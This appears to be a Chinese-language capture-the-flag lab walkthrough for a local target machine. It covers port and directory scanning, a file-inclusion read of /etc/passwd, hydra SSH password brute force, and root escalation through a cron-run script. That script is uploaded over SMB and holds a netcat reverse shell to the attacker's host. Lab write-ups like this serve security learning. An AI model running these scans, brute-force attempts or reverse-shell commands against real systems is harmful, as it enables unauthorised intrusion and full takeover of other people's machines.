1. 信息搜集
IP扫描,发现主机 192.168.163.142
端口扫描,发现80、22端口
1
nmap -A -p- 192.168.163.142
目录扫描,但未扫到任何东西
1
2
3
dirsearch -u http://192.168.163.142 -e* -i 200
nikto -h 192.168.163.142
dirb http://192.168.163.142
访问网站,发现链接
访问链接: http://192.168.163.142/atlasg.jpg 发现一张图片
从图片中找有字符的地方
有 M
,D
和5个 X
,暗示MD5
使用atlasg、atlasg.jpg 和图片文件的MD5值尝试访问失败
2. 目录爆破
生成MD5的目录字典
1
for i in $(cat /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt); do echo $i | md5sum >> md5.txt; done
vim删除多余字符
1
:%s/ -//g
1
dirsearch -w md5.txt -u http://192.168.163.142 -f php
http://192.168.163.142/f66b22bf020334b04c7d0d3eb5010391.php
1
wfuzz -w /usr/share/wordlists/rockyou.txt -u http://192.168.163.142/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=/etc/passwd --hw 0
发现文件包含漏洞
发现用户:freddie
尝试日志注入,无法获取日志文件,尝试爆破ssh
3. SSH爆破
使用之前生成的MD5字典进行爆破
1
hydra -l freddie -P md5.txt ssh://192.168.163.142
获得密码:61a4e3e60c063d1e472dd780f64e6cad
ssh登陆成功,发现日志文件目录权限高,无法访问
查看家目录
查看flag文件
查看端口服务,发现139、445
1
ss -tnlp
使用 smbclient 访问 SMB 服务中的文件共享
1
smbclient -L 127.0.0.1
发现目录 grotesque
查看,无内容
下载pspy64 DominicBreuker/pspy: Monitor linux processes without root permissions 监控Linux进程和定时任务
上传到目标机
1
2
chmod +x pspy64
./pspy64
发现每分钟以root身份执行/smbshare
目录下脚本
4. root提权
添加自定义脚本,反弹shell
1
echo 'nc -nv 192.168.163.132 4444 -e /bin/bash' > shell.sh
直接写入无权限,利用smb传入脚本文件
1
2
smbclient //127.0.0.1/grotesque
put shell.sh
kali开启监听 nc -lvp 4444
连接成功获取到flag